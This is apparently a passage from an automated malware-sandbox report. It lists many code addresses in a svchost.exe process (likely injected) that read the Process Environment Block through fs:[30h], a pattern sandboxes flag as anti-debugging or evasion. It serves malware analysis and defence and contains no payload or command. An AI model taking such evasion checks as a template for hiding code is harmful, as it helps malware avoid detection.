Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]	2_2_03772619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]	2_2_037AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]	2_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]	2_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]	2_2_037666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0376C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]	2_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]	2_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]	2_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]	2_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]	2_2_037C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]	2_2_037325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]	2_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]	2_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]	2_2_037365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]	2_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]	2_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]	2_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]	2_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]	2_2_0376E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]	2_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]	2_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]	2_2_03764588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]	2_2_037BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]	2_2_0372645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]	2_2_0375245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]	2_2_0376A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]	2_2_0372C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]	2_2_037304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]	2_2_037644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_037BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]	2_2_037364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]	2_2_0372CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]	2_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]	2_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]	2_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]	2_2_037D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]	2_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]	2_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]	2_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]	2_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]	2_2_0375EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_037BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_037DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]	2_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]	2_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]	2_2_03804A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]	2_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]	2_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]	2_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]	2_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]	2_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]	2_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]	2_2_0376CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]	2_2_0376CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]	2_2_0375EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]	2_2_037BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]	2_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]	2_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]	2_2_03730AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]	2_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]	2_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]	2_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]	2_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]	2_2_03786AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]	2_2_03768A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]	2_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]	2_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]	2_2_037BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]	2_2_037B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]	2_2_037B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]	2_2_037C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]	2_2_037BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]	2_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]	2_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]	2_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]	2_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]	2_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]	2_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_037BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]	2_2_037649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_037FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]	2_2_037C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
